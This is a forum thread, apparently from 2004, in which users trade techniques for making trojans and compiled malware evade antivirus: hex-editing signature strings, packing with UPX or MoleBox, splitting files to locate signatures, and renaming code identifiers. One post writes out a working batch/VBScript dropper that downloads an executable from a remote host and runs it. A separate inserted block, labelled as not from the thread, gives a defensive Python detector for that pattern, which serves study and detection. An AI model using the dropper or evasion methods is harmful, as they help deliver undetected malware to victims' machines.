passi
Hi

I know this has been asked several times, but I have problems with this board's search engine.

I have two questions:

1| How can I make normal binaries AV proof?
2| How can I change a source code so that it is not detected once compiled?


Of course I have some information about making an app AV proof, and sometimes it works - but I need a better way.


thank you
Partizaan
My opinion

1| How can I make normal binaries AV proof?

- Hex edit the text strings.
- Compress with UPX or MoleBox. With MoleBox you can pack the DLL into the exe.

2| How can I change a source code so that it is not detected once compiled?

- Following the above. A file is tagged as a virus by a 'viril' string, or whatever I should call it.
You have to change that string. So find in the source code what makes it tagged as a virus.

Example:
ECHO Set xPost = CreateObject("Microsoft.XMLHTTP") >backup.vbs
ECHO xPost.Open "GET","http://ip/ntuser.exe",0 >>backup.vbs
ECHO xPost.Send() >>backup.vbs
ECHO Set sGet = CreateObject("ADODB.Stream") >>backup.vbs
ECHO sGet.Mode = 3 >>backup.vbs
ECHO sGet.Type = 1 >>backup.vbs
ECHO sGet.Open() >>backup.vbs
ECHO sGet.Write(xPost.responseBody) >>backup.vbs
ECHO sGet.SaveToFile "ntusers.exe",2 >>backup.vbs
ECHO Dim Partizaan >>backup.vbs
ECHO Set Partizaan = CreateObject("WScript.Shell") >>backup.vbs
ECHO Partizaan.Run "ntusers.exe" >>backup.vbs
cscript backup.vbs

This is a 'virus'... which is why I have put in black what could trigger it in the source.
For binaries you could use a file splitter and start splitting your trojan. Each time you get a part, scan it. So keep splitting until you have a small part. Find in there the trigger for the AV and change a value. Break the string. However, I read a tutorial about it, but I have doubts about it.
Lanig
As Partizaan said, with 1... you can just hex-edit or pack (I suggest MoleBox).
With 2... when you have the source code you could try to change variable and function names and maybe add some useless functions inside the source code. If the AV doesn't find a specific data line but the exe signature, then that way should work.
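Added example (not from the thread, and not code by any of its posters): a small behavioural check for the download-and-execute pattern in Partizaan's VBScript, written from a defender's side. It keys on the combination of COM objects and calls rather than on any one string, which is why the variable-renaming idea in the post above does not help against this kind of detection: the names `xPost`, `sGet` and `Partizaan` never appear in the rules. The sample scripts, the rule names and the `example.invalid` URL are constructed for the demonstration.

```python
import re

# Constructed sample inputs (not from the original thread).
# The first is the same download-and-execute flow as the thread's
# backup.vbs, but with every variable renamed; the second is benign and
# uses only one of the building blocks (WScript.Shell).
DOWNLOADER_RENAMED = '''
Set a1 = CreateObject("Microsoft.XMLHTTP")
a1.Open "GET", "http://example.invalid/payload.bin", 0
a1.Send()
Set b2 = CreateObject("ADODB.Stream")
b2.Mode = 3
b2.Type = 1
b2.Open()
b2.Write(a1.responseBody)
b2.SaveToFile "payload.exe", 2
Set c3 = CreateObject("WScript.Shell")
c3.Run "payload.exe"
'''

BENIGN = '''
Set fso = CreateObject("Scripting.FileSystemObject")
Set sh = CreateObject("WScript.Shell")
sh.Run "notepad.exe"
'''

# Each rule describes one behavioural building block. Rule names are
# hypothetical labels chosen for this example; the ProgIDs are the real
# Windows COM identifiers. Matching is case-insensitive because VBScript is.
RULES = {
    "http_client": re.compile(
        r'CreateObject\s*\(\s*"(Microsoft\.XMLHTTP'
        r'|MSXML2\.[A-Za-z0-9.]*XMLHTTP[A-Za-z0-9.]*'
        r'|WinHttp\.WinHttpRequest[A-Za-z0-9.]*)"\s*\)', re.I),
    "binary_stream": re.compile(r'CreateObject\s*\(\s*"ADODB\.Stream"\s*\)', re.I),
    "write_to_disk": re.compile(r'\.SaveToFile\b', re.I),
    "shell_exec": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I),
    "run_call": re.compile(r'\.(Run|Exec)\b', re.I),
}


def matched_rules(script: str) -> set:
    """Return the set of rule names whose pattern occurs anywhere in the script."""
    return {name for name, rx in RULES.items() if rx.search(script)}


def is_download_and_execute(script: str) -> bool:
    """Fire only when the script both fetches remote content to disk and
    launches something via the shell. A single component on its own
    (e.g. WScript.Shell in an admin script) is not enough."""
    hits = matched_rules(script)
    fetches = "http_client" in hits and ("binary_stream" in hits or "write_to_disk" in hits)
    executes = "shell_exec" in hits and "run_call" in hits
    return fetches and executes


if __name__ == "__main__":
    for label, script in (("renamed downloader", DOWNLOADER_RENAMED), ("benign", BENIGN)):
        print(f"{label}: rules={sorted(matched_rules(script))} "
              f"flagged={is_download_and_execute(script)}")
```

Because the check reads the script text, it also fires on the batch-file form in the thread, where the same lines are written out with ECHO, since the ProgIDs and method names are still present verbatim there.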
AgentOrange
QUOTE (Lanig @ Aug 15 2004, 08:58 PM)
As Partizaan said, with 1... you can just hex-edit or pack (I suggest MoleBox).
With 2... when you have the source code you could try to change variable and function names and maybe add some useless functions inside the source code. If the AV doesn't find a specific data line but the exe signature, then that way should work.

I don't believe changing the names in the code will help. The compiler is trying to make the final product as small as possible (without hurting the speed of the code, unless you tell the compiler to do so), so the final binary doesn't keep any names.

I find that sometimes, if I compile the code under a different compiler, AVs don't detect it... it depends on how old the source code is and how many variants have been made.

I think MoleBox is the way to go.

peace out
FiNaLBeTa
Read this nice article; it's more theory, but nice: http://www.neworder.box.sk/newsread.php?newsid=11954
passi
Thank you guys ^^

I will try all these things. Hope it will work ^^


/Edit: I added "Stealth Tools" as an attachment. Check them out if you want.